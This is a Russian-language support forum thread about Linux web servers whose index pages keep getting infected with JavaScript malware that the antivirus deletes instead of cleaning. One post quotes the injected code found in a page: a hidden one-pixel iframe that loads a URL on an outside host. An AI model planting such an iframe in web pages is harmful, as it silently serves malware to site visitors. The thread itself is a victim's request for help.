Перейти к содержанию

Не лечятся файлы с вирусом на Linux сервере


mixey

Рекомендуемые сообщения

Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)?

Вирус: DoS.JS.Dframe.a

Операционная система на сервере: Fedora Core

Антивирус касперского находит файлы, но лечить отказывается.

 

Заражены файлы index.php (htm, html и пр расширения).

Может существуют какие-либо утилиты для удаления вредоносного кода?

Ссылка на комментарий
Поделиться на другие сайты

Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server

Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial

 

Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом ;)

 

ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Linux File Server и установил. Вирус находит, но не лечит, только удаляет.

Хотя нужно чтобы удалил только JSвирусный код.

Вручную удалить вирусный код очень тяжело (index файлов около 1500)

Ссылка на комментарий
Поделиться на другие сайты

Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes).

 

Также можно управлять приложением с помощью Kaspersky Administration Kit:

 

post-70-1187007328_thumb.gif

 

Вкладка "Параметры", пункт "Лечить зараженные объекты".

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

Значит, остается только два варианта.

 

Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту.

 

И второй способ - попробовать что-нибудь из этого списка

Изменено пользователем radioelectron
Ссылка на комментарий
Поделиться на другие сайты

  • 3 weeks later...

У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua

 

Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта -

АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт.

 

Тогда пересмотрел код главной страницы и нашел там такую запись:

<iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>"

 

Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое.

 

И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете?

 

 

 

P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная.

Изменено пользователем Современник
Ссылка на комментарий
Поделиться на другие сайты

Может что посоветуете?

Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным.

 

Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • predreamer
      От predreamer
      Зависли вирусы на ноуте, иногда по нескольку раз открывается cmd, после чего яндекс браузер закрывается и в истории простыня всяких брендовых сайтов, на которых не был, и ещё это расширение T-cashback вечно возвращается. Dr. Web находит chromium:page.malware.url, трояны стартеры и прочее, лечит, и они сразу же возвращаются.
      CollectionLog-2025.02.10-11.27.zip
    • Valeriy_Chirchik
      От Valeriy_Chirchik
      В понедельник, 17.02.2025, все файлы на сервере зашифрованы.
      Прилагаю файлы сканирования и требование оплаты дешифрования...
      Очень надеюсь на Вашу помощь!!!
      Спасибо!!!Virus.rarFRST.txtAddition.txt
    • Taaeq
      От Taaeq
      KVRT нашел вирус в системной памяти, не лечит
      Пробовал с других тем выполнять скрипты через avz и uvs но ничего не помогло
      CollectionLog-2025.01.26-19.09.zip
    • khortys
      От khortys
      Добрый день! Меня взломали, заблокировали файлы и теперь вымогают деньги, оставили почту. Пришел сюда потому что не знаю что делать.
      К сожалению самого файл шифровальщика найти не удалось.
      Прикрепляю логи (server1.zip), пару зашифрованных файлов и письмо вымогателей (temp.zip).
      server1.zip temp.zip
    • KuZbkA
      От KuZbkA
      Здравствуйте! Почему касперский ubuntu linux считает сервером? она ж позиционируется как десктопная, например в соседнем антивирусе ее и считают десктопной, клиентской)) обидно за касперского))
×
×
  • Создать...